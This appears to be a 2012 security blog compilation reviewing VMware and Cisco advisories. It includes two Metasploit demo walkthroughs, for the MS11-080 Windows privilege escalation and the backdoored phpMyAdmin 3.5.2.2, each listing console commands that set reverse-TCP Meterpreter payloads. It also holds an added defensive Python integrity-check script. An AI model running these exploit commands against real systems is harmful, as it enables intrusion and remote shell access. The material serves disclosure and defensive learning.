VMware Security Advisory VMSA-2012-0014 Review

VMware released, on 04 October 2012, one security advisory, VMSA-2012-0014, concerning VMware vCenter Operations, vCenter CapacityIQ and Movie Decoder.

VMware Movie Decoder Installer binary planting vulnerability

VMware Movie Decoder is affected by one vulnerability, CVE-2012-4897, with a 6.9 CVSS base score. The vulnerability was discovered and reported by Mitja Kolsek of ACROS Security. Movie Decoder versions prior to 9.0 are affected.

vCenter Operations cross-site scripting vulnerability

vCenter Operations is affected by an XSS vulnerability, CVE-2012-5050, with a 4.3 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. vCOps versions prior to 5.0.x are affected.

vCenter CapacityIQ path traversal vulnerability

vCenter CapacityIQ is affected by a path traversal vulnerability, CVE-2012-5051, with a 5.0 CVSS base score. The vulnerability was discovered and reported by Alexander Minozhenko of ERPScan. CapacityIQ versions prior to vCOps 5.0.x are affected.

MS11-080 Microsoft Windows AfdJoinLeaf Privilege Escalation Metasploit Demo

Timeline :

Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability on 2011-10-11
Metasploit PoC provided on 2012-10-02

PoC provided by :

Bo Zhou
Matteo Memelli
Spencer McIntyre

Reference(s) :

MS11-080
CVE-2011-2005

Affected version(s) :

Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2

Tested on Windows XP Pro SP3 with :

N/A

Description :

This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and, when triggered with a call to NtQueryIntervalProfile, will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring its own token to avoid causing system instability.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sessions -i 1
getuid
sysinfo
background

use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit

sessions -i 2
sysinfo
getuid

Cisco September 2012 Security Advisory Bundle Review

Cisco released, on 26 September 2012, as part of its bi-annual Security Advisory Bundle, 9 security bulletins dealing with 8 vulnerabilities. Eight of the advisories address vulnerabilities in Cisco IOS Software, and one advisory addresses a vulnerability in Cisco Unified Communications Manager.

cisco-sa-20120926-bgp – Cisco IOS Software Malformed Border Gateway Protocol Attribute Vulnerability

cisco-sa-20120926-bgp concerns Cisco IOS, IOS-XR and Cisco IOS-XE Software, which contain a vulnerability in the Border Gateway Protocol (BGP) routing protocol feature. Repeated exploitation of the vulnerability could lead to an inability to route packets to BGP neighbors during reconvergence times.

The vulnerability is identified as CVE-2012-4617, with a CVSS base score of 7.1, and was internally discovered by Cisco during testing.

cisco-sa-20120926-ios-ips – Cisco IOS Software Intrusion Prevention System Denial of Service Vulnerability

cisco-sa-20120926-ios-ips concerns the Intrusion Prevention System (IPS) feature present in Cisco IOS Software. An unauthenticated, remote attacker could cause a reload of an affected device.

The vulnerability is identified as CVE-2012-3950, with a CVSS base score of 7.8, and was discovered when handling customer support requests.

cisco-sa-20120926-nat – Cisco IOS Software Network Address Translation Vulnerabilities

cisco-sa-20120926-nat concerns Cisco IOS Software Network Address Translation (NAT), which contains two denial of service (DoS) vulnerabilities.

The CVE-2012-4618 and CVE-2012-4619 vulnerabilities both have a CVSS base score of 7.8, and were discovered during troubleshooting of TAC service requests.

cisco-sa-20120926-c10k-tunnels – Cisco IOS Software Tunneled Traffic Queue Wedge Vulnerability

cisco-sa-20120926-c10k-tunnels concerns Cisco IOS Software on Cisco 10000 Series routers, which contains a vulnerability when processing IP tunneled packets. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4620, with a CVSS base score of 7.8, and was discovered during troubleshooting of a customer issue.

cisco-sa-20120926-dhcpv6 – Cisco IOS Software DHCP Version 6 Server Denial of Service Vulnerability

cisco-sa-20120926-dhcpv6 concerns Cisco IOS Software and Cisco IOS XE Software, which contain a vulnerability that could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4623, with a CVSS base score of 7.1, and was discovered by Cisco during internal testing.

cisco-sa-20120926-ecc – Cisco Catalyst 4500E Series Switch with Cisco Catalyst Supervisor Engine 7L-E Denial of Service Vulnerability

cisco-sa-20120926-ecc concerns Catalyst 4500E series switches with Supervisor Engine 7L-E, which contain a vulnerability that could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4622, with a CVSS base score of 7.8, and was discovered when handling customer service requests.

cisco-sa-20120926-dhcp – Cisco IOS Software DHCP Denial of Service Vulnerability

cisco-sa-20120926-dhcp concerns Cisco IOS Software, which contains a vulnerability that could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4621, with a CVSS base score of 7.8, and was discovered during the troubleshooting of customer service requests.

cisco-sa-20120926-cucm – Cisco Unified Communications Manager Session Initiation Protocol Denial of Service Vulnerability

cisco-sa-20120926-cucm concerns Cisco Unified Communications Manager, which contains a vulnerability in its Session Initiation Protocol (SIP) implementation. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-3949, with a CVSS base score of 7.8, and was discovered during troubleshooting of TAC service requests.

cisco-sa-20120926-sip – Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability

cisco-sa-20120926-sip concerns Cisco IOS Software and Cisco IOS XE Software, which contain a vulnerability in their Session Initiation Protocol (SIP) implementation. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-3949, with a CVSS base score of 7.8, and was discovered during troubleshooting of TAC service requests.

CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Timeline :

Backdoor discovered by Passerby on 2012-09-25
Backdoor presence vendor notification on 2012-09-25
Metasploit PoC provided on 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from the cdnetworks-kr-1 SourceForge.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.
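The defender's side of this incident is an integrity check on what was downloaded and what is installed. The following Python script is an added example, not code from the original post, from phpMyAdmin or from Metasploit: it compares a release archive's SHA-256 against the checksum published by the project itself (EXPECTED_SHA256 is a placeholder, not the real value, and must be taken from the project's own checksum list rather than from a mirror) and flags the rogue server_sync.php file, which a genuine 3.5.2.2 release does not ship. The sample archives it builds are constructed stand-ins so the script runs offline.

```python
"""Integrity audit for a phpMyAdmin release archive and an installed tree.

Added example (not from the original post or the phpMyAdmin project).
Assumptions: the operator supplies the archive checksum published by the
project (EXPECTED_SHA256 below is a placeholder), and a legitimate 3.5.2.2
release contains no file named server_sync.php.
"""
import hashlib
import io
import os
import zipfile

# File names that have no business in a genuine release (from PMASA-2012-5).
ROGUE_FILES = {"server_sync.php"}

# Placeholder: replace with the SHA-256 published by the project, not by a mirror.
EXPECTED_SHA256 = "0" * 64


def sha256_of(data: bytes) -> str:
    """Hex SHA-256 of the archive bytes as downloaded."""
    return hashlib.sha256(data).hexdigest()


def archive_matches(data: bytes, expected: str = EXPECTED_SHA256) -> bool:
    """True when the downloaded archive hashes to the published checksum."""
    return sha256_of(data) == expected.lower()


def suspicious_entries(zip_bytes: bytes) -> list:
    """Archive members whose basename is a known rogue file, in archive order."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if os.path.basename(n) in ROGUE_FILES]


def suspicious_paths(root: str) -> list:
    """Walk an installed tree and return the paths of known rogue files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        hits.extend(os.path.join(dirpath, f) for f in files if f in ROGUE_FILES)
    return sorted(hits)


def audit(zip_bytes: bytes, expected_sha256: str = EXPECTED_SHA256) -> dict:
    """Combine both checks; a clean archive has hash_ok True and no rogue files."""
    return {
        "hash_ok": archive_matches(zip_bytes, expected_sha256),
        "rogue_files": suspicious_entries(zip_bytes),
    }


def build_sample_archive(with_backdoor: bool) -> bytes:
    """Constructed stand-in for a downloaded release zip (not real phpMyAdmin content)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("phpMyAdmin-3.5.2.2-all-languages/index.php", "<?php // stand-in ?>")
        if with_backdoor:
            zf.writestr("phpMyAdmin-3.5.2.2-all-languages/server_sync.php",
                        "<?php // stand-in for the planted file ?>")
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_sample_archive(with_backdoor=False)
    tampered = build_sample_archive(with_backdoor=True)
    # The clean archive's own hash plays the role of the published checksum here.
    published = sha256_of(clean)
    print("clean archive   :", audit(clean, published))
    print("tampered archive:", audit(tampered, published))
```

Both checks are needed: the hash comparison catches any modification of the archive, while the file-name scan still finds the planted file in a tree that was unpacked long before anyone thought to verify the download.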

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid